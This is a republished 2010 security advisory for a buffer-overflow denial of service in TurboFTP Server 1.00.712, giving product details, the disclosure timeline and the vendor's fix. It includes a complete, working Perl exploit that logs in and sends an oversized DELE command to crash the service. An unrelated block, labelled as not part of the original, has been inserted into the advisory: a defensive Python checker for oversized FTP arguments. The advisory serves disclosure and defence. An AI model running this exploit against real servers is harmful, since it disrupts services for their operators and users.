[CORELAN-10-004] TurboFTP Server 1.00.712 remote DoS

2010-01-17T00:00:00
ID SECURITYVULNS:DOC:23049
Type securityvulns
Reporter Securityvulns
Modified 2010-01-17T00:00:00

Description

|------------------------------------------------------------------|
| http://www.corelan.be:8800                                       |
| security@corelan.be                                              |
|-------------------------------------------------[ EIP Hunters ]--|
| Vulnerability Disclosure Report                                  |
|------------------------------------------------------------------|

Advisory : CORELAN-10-004
Disclosure date : Jan 12, 2010
Corelan Reference : http://www.corelan.be:8800/index.php/forum/security-advisories/corelan-10-004-turboftp-server-1-00-712-dos/

0x00 : Vulnerability information

[*] Product : Turbo FTP Server
[*] Version : 1.00.712
[*] Vendor : turbosoft inc
[*] URL : http://www.tbsoftinc.com
[*] Platform : Windows
[*] Type of vulnerability : Buffer overflow - DoS
[*] Risk rating : Medium
[*] Issue fixed in version : 1.00.720
[*] Vulnerability discovered by : corelanc0d3r (corelanc0d3r[at]gmail[dot]com)
[*] Greetings to : EdiStrosar, rick2600, mr_me, ekse & MarkoT from Corelan Team

0x01 : Vendor description of software

From the vendor website:

TurboFTP Server is a high performance, secure, scalable and management friendly file transfer server running on Windows platforms. With it you can easily set up a secure file transfer server that delivers regular FTP, FTP over SSL/TLS, and SFTP over SSH services with virtual domains, advanced directory access control, virtual folders, IP access control, flexible authentication options and many other features.

0x02 : Vulnerability details

The "Turbo FTP Server" FTP service is vulnerable to a buffer overflow, allowing a malicious person to trigger a Denial of Service condition against this service.

In order to trigger the vulnerability, the remote client needs to be able to log in and issue a specially crafted DELE command.

Note that other commands may be vulnerable too.
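Added example (not part of the original advisory or of Corelan's code): a defender-side check that parses the client side of an FTP control channel and flags any command, DELE or otherwise, whose argument is oversized, plus a build comparison against the fixed version 1.00.720. The 512-byte threshold, the function names and the sample capture are assumptions made for illustration.

```python
import re

MAX_ARG_LEN = 512           # assumption: site policy limit for one FTP argument
FIXED_BUILD = (1, 0, 720)   # from the advisory: issue fixed in 1.00.720

# An FTP command is a 3-4 letter verb, optionally followed by a space and an argument.
CMD_RE = re.compile(rb"([A-Za-z]{3,4})(?: (.*))?", re.DOTALL)

# Constructed sample: client-to-server bytes of one control session.
SAMPLE = (b"USER demo\r\nPASS demo\r\nDELE old.txt\r\n"
          b"DELE " + b"A" * 2000 + b"\r\nQUIT\r\n")


def parse_commands(stream: bytes):
    """Yield (verb, argument) for each CRLF-terminated command line."""
    for raw in stream.split(b"\r\n"):
        if not raw:
            continue
        m = CMD_RE.fullmatch(raw)
        if m is None:
            # Not a well-formed command: keep the whole line so its length is still checked.
            yield b"?", raw
        else:
            yield m.group(1).upper(), m.group(2) or b""


def find_oversized(stream: bytes, max_len: int = MAX_ARG_LEN):
    """Return (command index, verb, argument length) for every oversized argument."""
    alerts = []
    for index, (verb, arg) in enumerate(parse_commands(stream)):
        if len(arg) > max_len:
            alerts.append((index, verb.decode("ascii", "replace"), len(arg)))
    return alerts


def is_vulnerable_build(version: str) -> bool:
    """True when a version string such as '1.00.712' predates the fixed build."""
    return tuple(int(part) for part in version.split(".")) < FIXED_BUILD


if __name__ == "__main__":
    for index, verb, length in find_oversized(SAMPLE):
        print(f"command #{index}: {verb} argument of {length} bytes exceeds {MAX_ARG_LEN}")
    print("1.00.712 vulnerable:", is_vulnerable_build("1.00.712"))
```

Because the check is not tied to one verb, it also covers the advisory's note that commands other than DELE may be affected.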

0x03 : Vendor communication

[*] Dec 30, 2009 : Issue found
[*] Jan 1st, 2010 : contacted vendor
[*] Jan 1st, 2010 : vendor opened support ticket
[*] Jan 4th, 2010 : vendor asked for PoC code
[*] Jan 4th, 2010 : PoC code sent
[*] Jan 7th, 2010 : Vendor acknowledged issue and starts fixing issue
[*] Jan 11th, 2010 : vendor released fixed version
[*] Jan 12th, 2010 : Public disclosure

Release notes (on Vendor website):

V 1.00 Build 720 - Jan 11, 2010

[-] Buffer overflow problems reported by Corelan Team.
[-] A file open problem causing WinSCP failed to upload files.
[-] A problem in log recycling causes server to stall.

0x04 : Exploit/PoC

Exploit Title : TurboFTP Server 1.00.712 Remote DoS

Date : 30 december 2009

Author : corelanc0d3r (corelanc0d3r[at]gmail{dot}com)

Bug found by : corelanc0d3r (corelanc0d3r[at]gmail{dot}com)

Software Link : http://www.tbsoftinc.com/download/tbftpsrv.exe

Version : 1.00.712

Issue fixed in: 1.00.720

OS : Windows

Tested on : XP SP3 En (VirtualBox)

Type of vuln : DoS

Greetz to : Corelan Security Team::EdiStrosar/Ricks2600/MarkoT/mr_me/ekse

Script provided 'as is', without any warranty.

Use for educational purposes only.

Code :

print "|------------------------------------------------------------------|\n";
print "|                    http://www.corelan.be:8800                    |\n";
print "|-------------------------------------------------[ EIP Hunters ]--|\n\n";
print "[+] DoS exploit for TurboFTP Server 1.00.712 \n";

use IO::Socket;

if ($#ARGV ne 3) {
    print "\n usage: $0 <targetip> <targetport> <user> <password>\n";
    exit(0);
}

my $user=$ARGV[2];
my $pass=$ARGV[3];

print " [+] Preparing DoS payload\n";
my $payload = "A" x 2000;
print " [+] Connecting to server $ARGV[0] on port $ARGV[1]\n";
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                              PeerPort => $ARGV[1],
                              Proto    => 'tcp');

$ftp = <$sock> || die " [!] Unable to connect \n";
print " $ftp";
$ftp = <$sock>;
print " $ftp";
print " [+] Logging in (user $user)\n";
print $sock "USER $user\r\n";
$ftp = <$sock>;
print " $ftp";
print $sock "PASS $pass\r\n";
$ftp = <$sock>;
print " $ftp";
print " [+] Sending payload\n";
print $sock "DELE ".$payload."\r\n";
$ftp = <$sock>;
print " $ftp";
print " [+] Payload sent, now checking FTP server state\n";
$sock2 = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                               PeerPort => $ARGV[1],
                               Proto    => 'tcp');
my $ftp2 = <$sock2> || die " [+] DoS successful\n";
print " [!] DoS did not seem to work\n";
print " $ftp2\n";